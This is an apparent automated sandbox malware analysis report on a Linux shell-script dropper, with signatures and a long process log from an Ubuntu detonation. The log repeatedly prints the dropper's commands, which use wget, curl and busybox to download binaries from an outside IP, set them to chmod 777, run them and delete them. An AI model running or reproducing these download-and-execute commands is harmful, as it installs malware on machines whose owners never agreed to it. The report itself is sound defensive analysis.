Malware Analysis Report

2025-04-03 19:16

Sample ID 241120-ee2bsazelh
Target fbca926a194f3a16d4f651f15e8348a9b3c95ba55cba7c8c59266451178da939.sh
SHA256 fbca926a194f3a16d4f651f15e8348a9b3c95ba55cba7c8c59266451178da939
Tags
defense_evasion antivm discovery
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

fbca926a194f3a16d4f651f15e8348a9b3c95ba55cba7c8c59266451178da939

Threat Level: Shows suspicious behavior

The file fbca926a194f3a16d4f651f15e8348a9b3c95ba55cba7c8c59266451178da939.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion antivm discovery

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Writes file to tmp directory

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-20 03:52

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-20 03:52

Reported

2024-11-20 03:54

Platform

ubuntu1804-amd64-20240729-en

Max time kernel

31s

Max time network

129s

Command Line

[/tmp/fbca926a194f3a16d4f651f15e8348a9b3c95ba55cba7c8c59266451178da939.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J /tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J N/A
N/A /tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d /tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d N/A
N/A /tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ /tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ N/A
N/A /tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0 /tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0 N/A
N/A /tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ /tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ N/A
N/A /tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g /tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g N/A
N/A /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto N/A
N/A /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC N/A
N/A /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev N/A
N/A /tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD /tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD N/A
N/A /tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1 /tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1 N/A
N/A /tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL /tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL N/A
N/A /tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz /tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz N/A
N/A /tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0 /tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0 N/A
N/A /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto N/A
N/A /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC N/A
N/A /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev N/A
N/A /tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD /tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD N/A
N/A /tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1 /tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1 N/A
N/A /tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL /tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL N/A
N/A /tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz /tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz N/A
N/A /tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0 /tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0 N/A
N/A /tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J /tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J N/A
N/A /tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d /tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d N/A
N/A /tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ /tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ N/A
N/A /tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0 /tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0 N/A
N/A /tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ /tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ N/A
N/A /tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g /tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1 /usr/bin/curl N/A
File opened for modification /tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d /usr/bin/curl N/A
File opened for modification /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev /usr/bin/curl N/A
File opened for modification /tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD /usr/bin/curl N/A
File opened for modification /tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0 /usr/bin/curl N/A
File opened for modification /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto /usr/bin/curl N/A
File opened for modification /tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD /usr/bin/curl N/A
File opened for modification /tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J /usr/bin/curl N/A
File opened for modification /tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ /usr/bin/curl N/A
File opened for modification /tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g /usr/bin/curl N/A
File opened for modification /tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ /usr/bin/curl N/A
File opened for modification /tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1 /usr/bin/curl N/A
File opened for modification /tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL /usr/bin/curl N/A
File opened for modification /tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz /usr/bin/curl N/A
File opened for modification /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC /usr/bin/curl N/A
File opened for modification /tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0 /usr/bin/curl N/A
File opened for modification /tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J /usr/bin/curl N/A
File opened for modification /tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ /usr/bin/curl N/A
File opened for modification /tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0 /usr/bin/curl N/A
File opened for modification /tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g /usr/bin/curl N/A
File opened for modification /tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0 /usr/bin/curl N/A
File opened for modification /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC /usr/bin/curl N/A
File opened for modification /tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz /usr/bin/curl N/A
File opened for modification /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto /usr/bin/curl N/A
File opened for modification /tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d /usr/bin/curl N/A
File opened for modification /tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ /usr/bin/curl N/A
File opened for modification /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev /usr/bin/curl N/A
File opened for modification /tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL /usr/bin/curl N/A

Processes

/tmp/fbca926a194f3a16d4f651f15e8348a9b3c95ba55cba7c8c59266451178da939.sh

[/tmp/fbca926a194f3a16d4f651f15e8348a9b3c95ba55cba7c8c59266451178da939.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]

/bin/chmod

[chmod 777 GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]

/tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J

[./GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]

/bin/rm

[rm GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]

/usr/bin/wget

[wget http://216.126.231.240/bins/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]

/bin/chmod

[chmod 777 ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]

/tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d

[./ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]

/bin/rm

[rm ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]

/usr/bin/wget

[wget http://216.126.231.240/bins/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]

/bin/chmod

[chmod 777 1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]

/tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ

[./1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]

/bin/rm

[rm 1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]

/usr/bin/wget

[wget http://216.126.231.240/bins/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]

/bin/chmod

[chmod 777 i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]

/tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0

[./i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]

/bin/rm

[rm i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]

/usr/bin/wget

[wget http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]

/bin/chmod

[chmod 777 IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]

/tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ

[./IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]

/bin/rm

[rm IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]

/usr/bin/wget

[wget http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]

/bin/chmod

[chmod 777 LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]

/tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g

[./LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]

/bin/rm

[rm LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]

/usr/bin/wget

[wget http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]

/bin/chmod

[chmod 777 KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]

/tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto

[./KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]

/bin/rm

[rm KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]

/usr/bin/wget

[wget http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]

/bin/chmod

[chmod 777 mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]

/tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC

[./mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]

/bin/rm

[rm mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]

/usr/bin/wget

[wget http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]

/bin/chmod

[chmod 777 yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]

/tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev

[./yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]

/bin/rm

[rm yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]

/usr/bin/wget

[wget http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]

/bin/chmod

[chmod 777 SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]

/tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD

[./SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]

/bin/rm

[rm SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]

/usr/bin/wget

[wget http://216.126.231.240/bins/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]

/bin/chmod

[chmod 777 YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]

/tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1

[./YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]

/bin/rm

[rm YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]

/usr/bin/wget

[wget http://216.126.231.240/bins/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]

/bin/chmod

[chmod 777 IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]

/tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL

[./IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]

/bin/rm

[rm IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]

/usr/bin/wget

[wget http://216.126.231.240/bins/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]

/bin/chmod

[chmod 777 pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]

/tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz

[./pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]

/bin/rm

[rm pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]

/usr/bin/wget

[wget http://216.126.231.240/bins/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]

/bin/chmod

[chmod 777 O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]

/tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0

[./O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]

/bin/rm

[rm O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]

/usr/bin/wget

[wget http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]

/bin/chmod

[chmod 777 KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]

/tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto

[./KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]

/bin/rm

[rm KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]

/usr/bin/wget

[wget http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]

/bin/chmod

[chmod 777 mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]

/tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC

[./mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]

/bin/rm

[rm mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]

/usr/bin/wget

[wget http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]

/bin/chmod

[chmod 777 yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]

/tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev

[./yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]

/bin/rm

[rm yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]

/usr/bin/wget

[wget http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]

/bin/chmod

[chmod 777 SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]

/tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD

[./SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]

/bin/rm

[rm SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]

/usr/bin/wget

[wget http://216.126.231.240/bins/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]

/bin/chmod

[chmod 777 YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]

/tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1

[./YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]

/bin/rm

[rm YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]

/usr/bin/wget

[wget http://216.126.231.240/bins/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]

/bin/chmod

[chmod 777 IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]

/tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL

[./IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]

/bin/rm

[rm IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]

/usr/bin/wget

[wget http://216.126.231.240/bins/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]

/bin/chmod

[chmod 777 pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]

/tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz

[./pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]

/bin/rm

[rm pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]

/usr/bin/wget

[wget http://216.126.231.240/bins/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]

/bin/chmod

[chmod 777 O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]

/tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0

[./O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]

/bin/rm

[rm O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]

/usr/bin/wget

[wget http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]

/bin/chmod

[chmod 777 GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]

/tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J

[./GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]

/bin/rm

[rm GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]

/usr/bin/wget

[wget http://216.126.231.240/bins/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]

/bin/chmod

[chmod 777 ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]

/tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d

[./ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]

/bin/rm

[rm ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]

/usr/bin/wget

[wget http://216.126.231.240/bins/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]

/bin/chmod

[chmod 777 1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]

/tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ

[./1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]

/bin/rm

[rm 1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]

/usr/bin/wget

[wget http://216.126.231.240/bins/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]

/bin/chmod

[chmod 777 i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]

/tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0

[./i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]

/bin/rm

[rm i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]

/usr/bin/wget

[wget http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]

/bin/chmod

[chmod 777 IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]

/tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ

[./IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]

/bin/rm

